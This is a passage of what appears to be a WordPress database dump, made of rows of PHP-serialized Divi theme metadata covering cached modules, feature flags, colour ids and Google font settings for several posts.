:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32351,1202,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32352,1202,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32353,1202,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32354,1202,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32355,994,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32356,994,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32357,994,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32344,1085,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32345,1085,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32346,1085,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32341,1201,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32342,1201,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32343,1085,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32337,1519,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32338,1519,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32339,1201,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32340,1201,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32330,722,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32331,657,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32332,657,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32333,657,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32334,657,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32335,1519,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32336,1519,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32326,872,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32327,722,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32328,722,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32329,722,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32323,872,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32324,872,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32325,872,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32318,1251,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32319,604,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32320,604,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32321,604,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32322,604,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32316,1251,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32317,1251,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32311,1137,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32312,1137,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32313,1137,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32314,1137,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32315,1251,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32302,643,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32303,1027,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32304,1027,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32305,1027,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32306,1027,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32307,810,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32308,810,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32309,810,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32310,810,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32301,643,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\